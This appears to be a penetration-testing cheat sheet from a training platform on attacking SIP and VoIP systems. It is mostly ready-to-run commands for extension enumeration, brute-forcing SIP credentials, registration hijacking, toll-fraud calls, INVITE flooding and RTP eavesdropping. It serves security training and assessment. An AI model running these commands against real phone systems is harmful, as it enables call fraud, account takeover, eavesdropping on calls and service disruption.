Want to Practice These Techniques?

Try Hackviser's interactive cyber security upskilling platform - Learn by doing!

SIP and VoIP

Default Ports: 5060 (SIP), 5061 (SIP over TLS)

SIP is used by VoIP phones, PBXs, trunks, and call platforms. In pentests, SIP can expose extensions, weak phone credentials, call routing abuse, voicemail access, and PBX management weaknesses.

Connect

Using SIPVicious

SIPVicious is commonly used for SIP scanning and extension enumeration.

svmap target.com
svwar -m INVITE target.com
svwar -m REGISTER target.com

Using sipsak

sipsak sends SIP requests and checks server behavior.

sipsak -s sip:target.com
sipsak -vv -s sip:1000@target.com
sipsak -U -s sip:target.com

Using Linphone

A SIP softphone validates registration and call behavior with approved accounts.

linphonec
register sip:1000@target.com target.com password
call sip:1001@target.com

Using TLS

SIP over TLS should be checked for certificate and protocol issues.

openssl s_client -connect target.com:5061 -servername target.com
nmap -p 5061 --script ssl-cert,ssl-enum-ciphers target.com

Recon

Service Detection with Nmap

Scan UDP, TCP, and TLS SIP ports.

nmap -sU -sT -p 5060,5061 -sV target.com
nmap -sU -p 5060 --script sip-methods,sip-enum-users target.com
nmap -p 5061 --script ssl-cert,ssl-enum-ciphers target.com

SIP Method Discovery

Allowed methods reveal proxy, registrar, and PBX behavior.

nmap -sU -p 5060 --script sip-methods target.com
sipsak -vv -s sip:target.com

PBX Fingerprinting

Headers and error messages often reveal Asterisk, FreePBX, Kamailio, or Cisco systems.

svmap target.com
sipsak -vv -s sip:invalid@target.com

Enumeration

Extension Enumeration

Extension enumeration identifies valid users, phones, and voicemail targets.

svwar -m REGISTER -e1000-9999 target.com
svwar -m INVITE -e1000-9999 target.com
svwar -m OPTIONS -e1000-9999 target.com

Registration Check

Registration behavior can reveal valid extensions and authentication responses.

sipsak -vv -s sip:1000@target.com
sipsak -vv -s sip:9999@target.com

User and Trunk Discovery

Look for predictable extension ranges and trunk usernames.

svwar -D extensions.txt target.com
svwar -D users.txt -m REGISTER target.com

RTP Discovery

RTP media ranges may expose audio streams if not protected.

nmap -sU -p 10000-20000 target.com
rtpbreak -i eth0

Attack Vectors

Weak SIP Credentials

SIP phones often use numeric extensions and weak PIN-style passwords.

svcrack -u 1000 -r passwords.txt target.com
hydra -s 5060 -U -L users.txt -P passwords.txt target.com sip

Registration Hijacking

Valid SIP credentials can register a softphone as another extension.

linphonec
register sip:1000@target.com target.com password

Toll Fraud

Authenticated SIP access may allow outbound call abuse.

sipsak -s sip:+15551234567@target.com -a password -U -f invite.txt

Voicemail Access

Voicemail systems often use weak PINs or extension-based defaults.

svwar -D voicemail-extensions.txt target.com

SIP Invite Flooding

DoS tests must be explicitly scoped because voice systems are sensitive.

inviteflood eth0 target.com 1000 target.com 100

RTP Eavesdropping

Unencrypted RTP may expose call audio on local networks.

rtpbreak -i eth0
wireshark

Post-Exploitation

Call Path Review

Document reachable extensions, trunks, and dial patterns.

svwar -m REGISTER -e1000-9999 target.com > sip-extensions.txt
grep -Ei 'trunk|outbound|international|voicemail' sip-extensions.txt

Credential Reuse Check

Validate whether SIP credentials work on PBX portals or voicemail.

netexec http target.com -u users.txt -p passwords.txt

Evidence Collection

Collect banners, valid extensions, and scoped authentication evidence.

svmap target.com > sip-map.txt
svwar -m REGISTER -e1000-9999 target.com > sip-users.txt

Useful Tools

Tool	Purpose
`sipvicious`	SIP scanning and brute force
`sipsak`	SIP request testing
`nmap`	SIP service detection
`linphonec`	Softphone testing
`hydra`	Credential testing
`rtpbreak`	RTP capture analysis
`Wireshark`	SIP/RTP packet analysis

Security Misconfigurations

Misconfiguration	Risk
Extension enumeration	User and phone discovery
Weak SIP passwords	Registration hijacking
Exposed PBX	Voice infrastructure attack surface
Unrestricted outbound calls	Toll fraud
Weak voicemail PINs	Voicemail compromise
Unencrypted RTP	Call audio exposure
SIP over UDP exposed broadly	Brute force and scanning risk

Want to Practice These Techniques?

SIP and VoIP

Connect​

Using SIPVicious​

Using sipsak​

Using Linphone​

Using TLS​

Recon​

Service Detection with Nmap​

SIP Method Discovery​

PBX Fingerprinting​

Enumeration​

Extension Enumeration​

Registration Check​

User and Trunk Discovery​

RTP Discovery​

Attack Vectors​

Weak SIP Credentials​

Registration Hijacking​

Toll Fraud​

Voicemail Access​

SIP Invite Flooding​

RTP Eavesdropping​

Post-Exploitation​

Call Path Review​

Credential Reuse Check​

Evidence Collection​

Useful Tools​

Security Misconfigurations​